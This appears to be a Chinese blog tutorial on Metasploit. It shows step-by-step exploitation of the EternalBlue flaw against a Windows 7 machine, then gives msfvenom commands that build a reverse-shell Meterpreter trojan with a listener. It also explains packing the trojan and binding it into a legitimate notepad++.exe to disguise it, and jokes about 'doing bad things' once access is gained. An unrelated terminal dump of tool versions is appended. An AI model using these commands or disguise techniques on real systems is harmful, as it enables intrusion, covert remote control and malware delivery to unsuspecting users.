kali学习---metasploit

本文介绍了如何使用KaliLinux中的Metasploit工具对Windows系统进行永恒之蓝漏洞扫描和利用,包括msfconsole的使用方法、生成Meterpreter木马以及对生成的木马进行加壳和伪装的技巧。

kali—metasploit

metaspolit简介:

msf是一款开源安全漏洞利用和测试工具,继承了各种平台上常见的溢出漏洞和流行的shellcode,并继续保持更新。

  1. 首先终端提权:sudo su,输入密码,进入root权限。
  2. 打开msf:msfconsole,进入msf,注msf版本为 msf6。
采用msf对永恒之蓝漏洞进行扫描和利用:

**永恒之蓝漏洞简介:**2017年之前window系统基本上都存在永恒之蓝漏洞,下面采用msf进行永恒之蓝漏洞的扫描和利用。

  1. search ms17_010,针对永恒之蓝楼栋编号的应用,打开之后会看到以下模块。
  2. 使用模块两种方式:use 0use + name (use exploit/windows/smb/ms17_010_eternalblue) ,进入模块之后进行设置窗口:show options

    看到第一行的必选项(攻击目的的ip地址),还没有填写。接下来设置攻击目标的IP,这里需要一个window7的虚拟机。(msdn中下载相应镜像)。
  3. 查看靶机的ip地址:ipconfig192.168.1.8。并且关闭目标靶机的防火墙,使得kali能够ping通。

  4. show options来看必须要设置的选型。设置目标的ip地址,和端口号。

    之后再次采用 show options来查看是否已经设置完毕。
  5. 之后开始进行攻击run 出现如下界面,攻击成功,可以开始干坏事了(退出:exit;后台运行:background)
msf生成远控制木马

msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线。(msfvenom在shell里使用,不是msfconsole终端)

  1. windows可执行木马:msfcenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.6 lport=9999 -f exe -o demo.exe

    成功生成木马文件
  2. 开启鱼钩监视。使用use exploit/multi/handler进行监听。

    之后分别设置监听的payloadlhostlport

    run之后就开始等待鱼钩上钩。鱼儿上钩之后自动转换成 meterpreter>

ps:木马包装两种方式。

  1. 使用upx file进行加壳,但是upx对文件的大小有限制,过小文件会导致加壳失败。可选择其他的软件进行加壳:Themida(只有windows版本)。
    件会导致加壳失败。可选择其他的软件进行加壳:Themida(只有windows版本)。
  2. 使用可执行文件进行伪装,捆绑木马。msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.6 lport=9999 -f exe -x notepad++.exe -o notepad++.exe。把木马文件捆绑到本来存在的x64文件notepad++.exe下。
─(root㉿kali)-[~/sqlmap] └─# # 检查工具版本 nmap --version # 网络扫描器 msfconsole -v # Metasploit框架 sqlmap --version # SQL注入工具 # 检查工具组 apt list --installed | grep kali-tools Nmap version 7.95 ( https://nmap.org ) Platform: x86_64-pc-linux-gnu Compiled with: liblua-5.4.7 openssl-3.5.3 libssh2-1.11.1 libz-1.3.1 libpcre2-10.46 libpcap-1.10.5 nmap-libdnet-1.12 ipv6 Compiled without: Available nsock engines: epoll poll select Framework Version: 6.4.84-dev 1.9.9#stable WARNING: apt does not have a stable CLI interface. Use with caution in scripts. kali-tools-802-11/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-bluetooth/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-crypto-stego/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-database/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-detect/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-exploitation/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-forensics/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-fuzzing/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-gpu/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-hardware/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-identify/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-information-gathering/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-passwords/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-post-exploitation/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-protect/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-recover/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-reporting/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-respond/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-reverse-engineering/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-rfid/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-sdr/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-sniffing-spoofing/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-social-engineering/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-voip/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-vulnerability/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-windows-resources/kali-rolling,now 2025.3.2 amd64 [已安装] kali-tools-wireless/kali-rolling,now 2025.3.2 amd64 [已安装] ┌──(root㉿kali)-[~/sqlmap] └─#
09-28
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值